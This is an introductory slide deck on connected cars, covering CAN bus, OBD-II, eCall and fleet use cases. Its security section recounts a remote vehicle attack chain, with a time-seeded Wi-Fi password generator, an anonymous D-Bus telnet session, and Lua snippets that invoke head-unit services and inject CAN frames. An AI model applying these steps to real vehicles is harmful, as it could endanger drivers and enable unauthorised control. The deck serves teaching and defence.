Connected Car

An introduction to:
- CAN bus
- OBD-II
- connected car security
- connected car use-cases
Who am I?



Definition
- Car with internet-based communications between
- car and its surroundings
- car and third parties
- car and driver
Using either
- a dedicated internet connection
- a smartphone link

eCall
- Government program to reduce fatalities on the road
- Cuts emergency services' response time
- Time saved = lives saved
- Triggered automatically on airbag deployment, or manually by pushing a button in the car

eCall


eCall Timeline

2001: Presented
2007: Delayed
2011: Pushed back
2013: Adopted (2 year term)
2015: Target not met
2016: New target: 2018

Architectures
- Embedded
- Everything inside the car
- SIM card / modem / connectivity
- Runs standalone
- Vehicle centric
- Monthly fee to OEM
- Tethered
- External SIM card (glove compartment / phone)
- Cost associated with SIM card.

Architectures
- Integrated
- Via smartphone
- Driver distraction
- Cost associated with SIM card.
- After Market
- Onboard Diagnostics port (OBD-II solutions)
- Via smartphone Bluetooth connection
- Via dedicated 2G/3G/4G solution
- Internal CAN Solutions
- Onboard Diagnostics port (OBD-II solutions)

Manufacturers






OEM Characteristics
- Closed systems
- Very limited set of APIs
- Difficult to integrate with

- How to integrate?
- Remote APIs
- OEM Development platforms
Services offered
- Remote Diagnostics
- Stolen Vehicle
- Where did I park
- Speed monitoring
- Geo Fencing
- Telematics (insurance)

- Driver behavior monitoring
- Fuel prices
- Predictive maintenance
- Remote Services
- lock/unlock
- control AC
- monitor fuel level
- WiFi HotSpot
Vehicle Anatomy



Vehicle Anatomy
- Different components (ECUs)
- Different busses
- Lots of wires

CAN-BUS

CAN-BUS
- What
- Types of CAN
- CAN Nodes
- Other busses
- Demo

What is it ?
- Controller Area Network
- Way to link electronic systems (in a car)
- Allows these systems to communicate
- Developed by Bosch GmbH
- Simplifies the wiring requirements

First CAN bus car


Without CAN bus


With CAN bus


Reality


Link systems (nodes)


CAN Nodes
- Microcontroller: the brains
- CAN controller (often an integral part of the microcontroller)
- Transceiver: defined by ISO 11898-2/3


CAN Nodes

Node examples (figure): ECU, diagnostic device, prototyping device, SocketCAN


SocketCAN (Linux)

ifconfig
can0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
UP RUNNING NOARP MTU:16 Metric:1
RX packets:465418 errors:0 dropped:0 overruns:0 frame:0
TX packets:402 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10
RX bytes:3723344 (3.5 MiB) TX bytes:3216 (3.1 KiB)
eth0 Link encap:Ethernet HWaddr b8:27:eb:76:80:92
inet addr:192.168.1.114 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::66e3:3bb8:8ba:6a98/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:16991 errors:0 dropped:1 overruns:0 frame:0
TX packets:16397 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1879039 (1.7 MiB) TX bytes:3226514 (3.0 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:72 errors:0 dropped:0 overruns:0 frame:0
TX packets:72 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:6288 (6.1 KiB) TX bytes:6288 (6.1 KiB)
candump

candump -ta can0
(1463423655.613548) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.613769) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.623525) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.623735) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.633500) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.633720) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.643550) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.643768) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.644017) can0 1A0 [8] 00 15 E0 7C 00 00 00 00
(1463423655.653501) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.653682) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.663504) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.663729) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.673466) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.673689) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.683537) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.683755) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.693447) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.693666) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.693911) can0 1A0 [8] 00 15 E0 7C 00 00 00 00
(1463423655.694164) can0 301 [8] 01 00 3A 00 00 24 C0 00
(1463423655.694407) can0 410 [8] 80 01 3E 00 00 00 00 00
(1463423655.703490) can0 480 [8] 10 11 02 A0 00 00 00 00
(1463423655.703725) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423655.703949) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423655.704196) can0 300 [8] D8 C3 00 00 40 00 00 00
(1463423655.713458) can0 110 [8] 68 00 00 00 00 00 00 00
cansniffer

cansniffer can0
- time ID data ... < cansniffer can0 # l=2 h=10 t=50 >
0.000000 110 68 00 00 00 00 00 00 00 h.......
0.000000 120 40 32 02 77 2A 27 60 00 @2.w*'`.
0.000000 1a0 00 15 E0 7C 00 00 00 00 ...|....
0.000000 300 D8 C3 00 00 40 00 00 00 ....@...
0.000000 301 01 00 3A 00 00 24 C0 00 ..:..$..
0.000000 410 80 01 3E 00 00 00 00 00 ..>.....
0.000000 480 10 11 02 A0 00 00 00 00 ........
0.000000 510 63 1E 78 07 00 00 00 00 c.x.....
- Sniff the CAN bus instead of dumping it
- Watch out for repeating messages / new messages
cansend

(1463423913.010586) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.010815) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.020676) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.020829) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.027104) can0 7DF [8] 02 01 05 00 00 00 00 00
(1463423913.030696) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.030893) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.040475) can0 7E8 [8] 03 41 05 00 00 00 00 00
(1463423913.040716) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.040935) can0 120 [8] 40 32 02 77 2A 27 60 00
(1463423913.050566) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.050780) can0 120 [8] 40 32 02 77 2A 27 60 00
- Send a command to the CAN bus
# Get coolant temperature
cansend can0 7DF#0201050000000000
- Be sure to spot it in the dump
- Or sniff it
- time ID data ... < cansniffer can0 # l=2 h=10 t=50 >
0.000000 7df 02 01 05 00 00 00 00 00 ........
0.000000 7e8 03 41 05 00 00 00 00 00 .A......
Can-bus hacking




Different types of CAN
- ISO 11898-2 : High Speed CAN
- Typically includes modules responsible for engine, brakes, transmission,...
- ISO 11898-3 : Low Speed CAN
- Can include modules for climate control, audio, window & sunroof control,...

Not limited to cars
- Industry Machine control
- Medical Equipment
- Factory automation
- and even .....


Other busses

| | GMLAN | LIN | CAN | FlexRay |
|---|---|---|---|---|
| Speed | 33 kbit/s | 40 kbit/s | 1 Mbit/s | 10 Mbit/s |
| Wiring | 1 wire | 1 wire | 2 wires | 2/4 wires |
| Typical use | Single-wire CAN; low-speed GM / VW non-critical components | Body electronics (non-critical components) | Powertrain (engine, transmission) | High-performance powertrain (drive by wire / cruise control / active suspension) |
Accessing CAN



OBD-II

Onboard Diagnostics
- OBD refers to communication with the Engine Control Unit (ECU)
- Initial goal: help fight emissions and engine failures.
- Today: major source of info for aftermarket connected car platforms




OBD Specifications
- The diagnostic connector
- location
- pinout
- available protocols
- The Messaging format
- Supported vehicle parameters (PIDs)
- Encoding of those params
- Extensible list of DTCs (Diagnostic Trouble Codes)

Diagnostic connector
- Data Link Connector (DLC)
- SAE-J1962
- 16 pin connector
- female and male connector halves


Port location
- Prior to OBD-II:
- A bit of a mystery




Port location
- Since OBD-II: somewhat standardized.
- 16 inches from the steering wheel.
- Still sometimes difficult to find.


Port pinout
- 16 pins
- Different protocols
- standard
- vendor specific
- CAN being an important protocol.


OBD Protocols
- 5 possible protocols can be offered on the OBD-II port
- Normal vehicles
- SAE J1850 PWM
- SAE J1850 VPW
- ISO 9141-2
- ISO 14230 KWP2000
- ISO 15765 CAN
- Heavy Duty Vehicles
- J1939


OBD PIDs
- PID = Parameter ID
- Identifies a single data point
- Standard list of OBD-II (eOBD) PIDs
- Speed
- RPM
- Coolant Temperature
- Supported PIDs feature
- Indicates whether a manufacturer supports a certain PID
- Manufacturer specific PIDs
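
As an added example (not code from the slides or the speaker), a small Python decoder that reads candump -ta lines like the ones above, decodes the mode 01 answers for the PIDs the slides name (coolant temperature, RPM, speed, and the PID 00 supported-PIDs bitmask) and flags CAN IDs that were not present in a baseline capture, which is the "new messages" check the cansniffer slide recommends. The PID formulas are the standard OBD-II ones; the RPM and PID 00 frames in the sample are constructed, and the baseline ID set is taken from the cansniffer slide.

```python
import re
# One candump -ta line: "(1463423913.040475) can0 7E8 [8] 03 41 05 00 00 00 00 00"
LINE_RE = re.compile(r"\((?P<ts>[\d.]+)\)\s+\S+\s+(?P<id>[0-9A-Fa-f]+)\s+"
                     r"\[(?P<dlc>\d)\]\s*(?P<data>(?:[0-9A-Fa-f]{2}\s*)*)")
OBD_RESPONSE_IDS = range(0x7E8, 0x7F0)  # ECU answers to the 0x7DF functional request
# Standard mode 01 formulas; A and B are the first payload bytes after the PID
PID_DECODERS = {0x05: ("coolant_temp_c", lambda a, b: a - 40),
                0x0C: ("rpm", lambda a, b: (256 * a + b) / 4),
                0x0D: ("speed_kmh", lambda a, b: a)}

def parse_line(line):
    """Return (timestamp, can_id, data) for a candump line, None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    data = bytes.fromhex(m["data"].replace(" ", ""))
    return float(m["ts"]), int(m["id"], 16), data[:int(m["dlc"])]

def decode_obd(can_id, data):
    """Return (name, value) for a mode 01 positive response (0x41), else None."""
    if can_id not in OBD_RESPONSE_IDS or len(data) < 3 or data[1] != 0x41:
        return None
    length, pid = data[0], data[2]          # length byte counts mode + PID + payload
    payload = data[3:1 + length] + b"\x00"  # pad so single-byte PIDs still have a B
    if pid == 0x00:                         # PID 00: bitmask of supported PIDs 01..20
        bits = int.from_bytes(data[3:7], "big")
        return "supported_pids", [p for p in range(1, 33) if bits >> (32 - p) & 1]
    if pid in PID_DECODERS:
        name, formula = PID_DECODERS[pid]
        return name, formula(payload[0], payload[1])
    return "pid_%02X" % pid, payload[:length - 2]

def analyse(lines, baseline_ids):
    """Decode every OBD answer and collect IDs absent from the baseline capture."""
    decoded, new_ids = [], set()
    for _, can_id, data in filter(None, map(parse_line, lines)):
        if can_id not in baseline_ids:      # the "new messages" check from cansniffer
            new_ids.add(can_id)
        obd = decode_obd(can_id, data)
        if obd:
            decoded.append((can_id,) + obd)
    return decoded, sorted(new_ids)

# Constructed sample: the slides' coolant exchange plus invented RPM and PID 00 answers
SAMPLE = """(1463423913.020676) can0 110 [8] 68 00 00 00 00 00 00 00
(1463423913.027104) can0 7DF [8] 02 01 05 00 00 00 00 00
(1463423913.040475) can0 7E8 [8] 03 41 05 00 00 00 00 00
(1463423913.050000) can0 7E8 [8] 04 41 0C 1A F8 00 00 00
(1463423913.060000) can0 7E8 [8] 06 41 00 BE 3E B8 13 00""".splitlines()
BASELINE_IDS = {0x110, 0x120, 0x1A0, 0x300, 0x301, 0x410, 0x480, 0x510}  # cansniffer slide
```

Running analyse(SAMPLE, BASELINE_IDS) reports the diagnostic request and answer IDs (0x7DF, 0x7E8) as new relative to the baseline, which is exactly what an injected diagnostic session looks like in a capture.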

OBD PIDs


OBD DTC
- Extensible list of DTCs (Diagnostic Trouble Codes)


ELM327 chipset




STN1110


STN1110


ARM Architecture


OBD Security issues
- No authentication / authorization.
- Anyone who can access OBD / CAN can access everything!


Demo time



Connected Car Security
- Attack vectors
- Worst nightmare: compromising a vehicle without physical access by sending CAN messages onto its CAN bus.


- Image above comes from a 2013 blog post of somebody accessing CAN directly.
- In 2014, a team of IT security researchers pulled it off remotely!

Attack Vectors
- OBD-II Port / car wiring (Duh....)
- physical access required
- send CAN messages onto the CAN-BUS using OBD
- Cellular network
- Embedded cellular networks can also be "hacked".
- Use the network to "ping" the car.
- Infotainment system
- WIFI / Bluetooth stack
- Android apps
- USB / Audio files (CDs)
- Perform firmware updates (specially encoded CDs)
- Can often communicate with CAN-BUS

Attack Vectors
- Large VS small attack surface
- Large: bluetooth stack
- Small: key transponder (small range / window)
- Complexity of the car's architecture
- Physical components
- Software stacks
- OTA features
- Physical features
- USB dongles
- CD players

Architecture


Entry point
- Central head unit
- Access point to the Wi-Fi / Cellular / Bluetooth system
- Runs QNX RTOS on an ARM microcontroller


Wi-Fi
- Wi-Fi uses WPA2
- Pretty secure in principle.....
- But what if we can recover the algorithm that generates the password?

#include <stdlib.h>
#include <time.h>

/* Assumed mapping of 0..61 onto [a-zA-Z0-9]; the head unit's actual ordering
   is not shown on the slides, this stand-in only makes the snippet compile. */
static char convert_byte_to_ascii_letter(unsigned int v) {
    const char *alphabet = "abcdefghijklmnopqrstuvwxyz"
                           "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    return alphabet[v % 62];
}

char *get_password() {
    int c_max = 12;
    int c_min = 8;
    unsigned int t = time(NULL);        /* seed = wall clock: the whole password is a function of t */
    srand(t);
    unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;
    char *password = malloc(len + 1);   /* +1 and the terminator below added so callers get a C string */
    int v9 = 0;
    do {
        unsigned int v10 = rand();      /* rand() % 62 also carries a slight modulo bias */
        int v11 = convert_byte_to_ascii_letter(v10 % 62);
        password[v9] = v11;
        v9++;
    } while (len > v9);
    password[len] = '\0';
    return password;
}
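
As an added example (not the head unit's code or the speaker's), the same construction in Python next to a hardened generator, plus the entropy arithmetic that shows why password length does not help when the seed is a clock value. Python's random.Random stands in for the C srand()/rand() pair, so the strings differ from the real unit's; the sample seed reuses a capture timestamp from the candump slide.

```python
import math
import random
import secrets
import string

ALPHABET = string.ascii_letters + string.digits   # 62 symbols, like the v10 % 62 mapping
C_MIN, C_MAX = 8, 12                               # length bounds from get_password()

def weak_password(seed):
    """Mirror of get_password(): random.Random stands in for srand()/rand().

    The length and every character are a pure function of the one seed, so the
    effective key space is the set of plausible timestamps, not 62**len strings.
    """
    rng = random.Random(seed)                      # srand(t) with t = time(NULL)
    length = rng.randrange(C_MAX - C_MIN + 1) + C_MIN
    return "".join(ALPHABET[rng.randrange(2**31) % 62] for _ in range(length))

def strong_password(length=12):
    """Hardened form: OS CSPRNG via secrets.choice, uniform over the alphabet."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def seed_space_bits(window_seconds):
    """Effective entropy when the seed is a timestamp inside a known window."""
    return math.log2(window_seconds)

def nominal_bits(length):
    """What the password appears to offer: log2(62 ** length)."""
    return length * math.log2(len(ALPHABET))

if __name__ == "__main__":
    t = 1463423655                                 # a capture timestamp from the slides
    assert weak_password(t) == weak_password(t)    # deterministic in t
    print(f"one-year seed window: {seed_space_bits(365 * 86400):.1f} bits")
    print(f"nominal 8-char space: {nominal_bits(8):.1f} bits")
    print("hardened:", strong_password())
```

Even a whole year of candidate seeds is under 25 bits, against the 47 bits an 8-character password nominally offers; the fix is to draw the password from a CSPRNG, not to make it longer.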
- Once connected to Wi-Fi, do a portscan:

Portscan: get inside the D-Bus (anonymous access)
telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK 4943a53752f52f82a9ea4e6e00000001
BEGIN
And start hacking....
- Setting radio volume

-- Lua on the head unit: set the radio volume through the AudioSettings service
require "service"
params = {}
params.volume = tonumber(arg[1])  -- volume passed as the first script argument
x = service.invoke("com.harman.service.AudioSettings", "setVolume", params)
What about CAN access?

Head unit (figure): Texas Instruments OMAP DM3730 and Renesas V850
Vulnerabilities
- With physical access it is possible to get code running on the head unit
- if you have physical access with a USB stick (jailbreak)
- If you can access the in-car Wi-Fi (exploiting the D-Bus vulnerability/functionality)
- Both require either physical access or the ability for the attacker to join the Wi-Fi hotspot (if one even exists), respectively.

Sprint


- Femtocell device
- Get on the Sprint network and access any Sprint device.
Inject CAN messages
- Modify the firmware and upload it (remotely)
- Find a function in the V850 chip that can do CAN communication.
- Inject some code in there to launch CAN messages:

ipc = require("ipc")
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
-- frame layout: f0,02,39|91,LEN,CAN1,CAN2,CAN3,CAN4,DATA0,DATA1...
g:write(0xf0, 0x02, 91, 0x08, 0xf1, 0x86, 0xda, 0xf8,
        0x05, 0x2F, 0x51, 0x06, 0x03, 0x10, 0x00, 0x00)
Summary
- Get the IP of the vehicle
- Exploit OMAP chip on the head unit (using the D-BUS exploit - open port / anonymous access)
- Use provided DBus services to start hacking (switching radio / .... ).
- Still no CAN access at this point.
- Flash the V850 with modified firmware
- Can be done from the head unit using OTA
- Will prompt a reboot, which might warn the user that something is wrong.
- Inject CAN messages
- Mission accomplished.

Use-cases

Use-cases






Vehicle Identification
- Automatically identifies vehicles using the VIN (chassis number)
- Easy integration with 3rd party systems
Vehicle Maintenance
- Configuration of mileage intervals
- Time based or mileage based
- Keeps track of previous maintenance
- Specify intervals / thresholds
- Allows for the system to notify when vehicle is (over)due for maintenance
Vehicle Diagnostics
- Manufacturer specific engine fault codes (beyond the eOBD specification)


- Manufacturer specific fuel level readings (beyond the eOBD specification)
Vehicle Mileage
- High accuracy tachograph built-in via OBD-II
- Automatic read-out of mileage from the ECU and / or BCM on select models
- Better accuracy than GPS

Vehicle Introspection
- Get in-depth knowledge of the car's capabilities.
- Analyses the supported PIDs automatically

Vehicle Metrics
- Supported OBD-II PIDs
- Average / max speed , rpm
- Trip information (mileage, time)
- Battery voltage
- Eco-driving info (number of stops, idling time, speeding, braking, acceleration,….)
- Engine Temp
- Fuel level
- ....

Eco driving
- OBD-II based datasets for eco-driving :
- speed
- rpm
- throttle position
- fuel level
- accelerometer

Track and trace
- Know where your fleet is located

Track and trace
- Stream live OBD-II data from a running vehicle

Thank you

Connected Car
By Davy De Waele